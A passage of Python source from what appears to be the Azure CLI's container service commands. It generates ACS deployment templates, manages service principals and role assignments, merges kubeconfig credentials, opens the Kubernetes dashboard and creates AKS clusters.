"firstConsecutiveStaticIP": master_first_consecutive_static_ip,
"storageProfile": master_storage_profile,
})
if not master_profile:
master_pool_profile = default_master_pool_profile
else:
master_pool_profile = _update_dict(default_master_pool_profile, master_profile)
return master_pool_profile
def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile):
agent_pool_profiles = []
default_agent_pool_profile = {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
}
if api_version == "2017-07-01":
default_agent_pool_profile = _update_dict(default_agent_pool_profile, {
"count": int(agent_count),
"vmSize": agent_vm_size,
"osDiskSizeGB": int(agent_osdisk_size),
"osType": os_type,
"dnsPrefix": dns_name_prefix + 'agent',
"vnetSubnetID": agent_vnet_subnet_id,
"ports": agent_ports,
"storageProfile": agent_storage_profile,
})
if agent_profiles is None:
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"}))
else:
# override agentPoolProfiles by using the passed in agent_profiles
for idx, ap in enumerate(agent_profiles):
# if the user specified dnsPrefix, we honor that
# otherwise, we use the idx to avoid duplicate dns name
a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap)
agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a))
return agent_pool_profiles
def _generate_outputs(name, orchestrator_type, admin_username):
# define outputs
outputs = {
"masterFQDN": {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long
},
"sshMaster0": {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long
},
}
if orchestrator_type.lower() != "kubernetes":
outputs["agentFQDN"] = {
"type": "string",
"value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long
}
# override sshMaster0 for non-kubernetes scenarios
outputs["sshMaster0"] = {
"type": "string",
"value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long
}
return outputs
def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile):
properties = {
"orchestratorProfile": {
"orchestratorType": orchestrator_type,
},
"masterProfile": master_pool_profile,
"agentPoolProfiles": agent_pool_profiles,
"linuxProfile": {
"ssh": {
"publicKeys": [
{
"keyData": ssh_key_value
}
]
},
"adminUsername": admin_username
},
}
if api_version == "2017-07-01":
properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version
if windows_profile is not None:
properties["windowsProfile"] = windows_profile
return properties
# pylint: disable=too-many-locals
def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None,
location=None, admin_username="azureuser", api_version=None, master_profile=None,
master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="",
master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="",
agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0,
agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="",
orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None,
windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument
validate=False, no_wait=False):
"""Create a new Acs.
:param resource_group_name: The name of the resource group. The name
is case insensitive.
:type resource_group_name: str
:param deployment_name: The name of the deployment.
:type deployment_name: str
:param dns_name_prefix: Sets the Domain name prefix for the cluster.
The concatenation of the domain name and the regionalized DNS zone
make up the fully qualified domain name associated with the public
IP address.
:type dns_name_prefix: str
:param name: Resource name for the container service.
:type name: str
:param ssh_key_value: Configure all linux machines with the SSH RSA
public key string. Your key should include three parts, for example
'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm
:type ssh_key_value: str
:param content_version: If included it must match the ContentVersion
in the template.
:type content_version: str
:param admin_username: User name for the Linux Virtual Machines.
:type admin_username: str
:param api_version: ACS API version to use
:type api_version: str
:param master_profile: MasterProfile used to describe master pool
:type master_profile: dict
:param master_vm_size: The size of master pool Virtual Machine
:type master_vm_size: str
:param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine
:type master_osdisk_size: int
:param master_count: The number of masters for the cluster.
:type master_count: int
:param master_vnet_subnet_id: The vnet subnet id for master pool
:type master_vnet_subnet_id: str
:param master_storage_profile: The storage profile used for master pool.
Possible value could be StorageAccount, ManagedDisk.
:type master_storage_profile: str
:param agent_profiles: AgentPoolProfiles used to describe agent pools
:type agent_profiles: dict
:param agent_vm_size: The size of the Virtual Machine.
:type agent_vm_size: str
:param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine
:type agent_osdisk_size: int
:param agent_vnet_subnet_id: The vnet subnet id for master pool
:type agent_vnet_subnet_id: str
:param agent_ports: the ports exposed on the agent pool
:type agent_ports: list
:param agent_storage_profile: The storage profile used for agent pool.
Possible value could be StorageAccount, ManagedDisk.
:type agent_storage_profile: str
:param location: Location for VM resources.
:type location: str
:param orchestrator_type: The type of orchestrator used to manage the
applications on the cluster.
:type orchestrator_type: str or :class:`orchestratorType
<Default.models.orchestratorType>`
:param tags: Tags object.
:type tags: object
:param windows: If true, the cluster will be built for running Windows container.
:type windows: bool
:param admin_password: The adminstration password for Windows nodes. Only available if --windows=true
:type admin_password: str
:param bool raw: returns the direct response alongside the
deserialized response
:rtype:
:class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>`
instance that returns :class:`DeploymentExtended
<Default.models.DeploymentExtended>`
:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = _get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# if api-version is not specified, or specified in a version not supported
# override based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if addition[key]:
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
raise CLIError('A different object named {} already exists in {}'.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
else:
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError('failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope)
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
elif len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False, listen_port='8001',
enable_cloud_console_aks_browse=False):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
if in_cloud_console() and not enable_cloud_console_aks_browse:
raise CLIError('Browse is disabled in cloud shell by default.')
proxy_url = 'http://127.0.0.1:{0}/'.format(listen_port)
_, browse_path = tempfile.mkstemp()
# TODO: need to add an --admin option?
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name",
"--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console() and enable_cloud_console_aks_browse:
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/8001')
result = json.loads(response.text)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{}'.format(term_id),
json={"url": result['url']})
logger.warning('To view the console, please open %s in a new tab', result['url'])
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(proxy_url)
try:
subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", dashboard_pod, "{0}:9090".format(listen_port)])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
# TODO: Better error handling here.
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
skip_subnet_role_assignment=False,
network_plugin=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
no_wait=False,
purge_sp_cache=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = _get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
max_pods=int(max_pods) if max_pods else None
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name, purge_sp_cache=purge_sp_cache)
service_principal_profile = ContainerServiceServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address]):
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
if 'omsagent' in addon_profiles:
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=False if disable_rbac else True,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=mc)
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = _get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = _get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
else:
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="nodepool1", no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name:
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
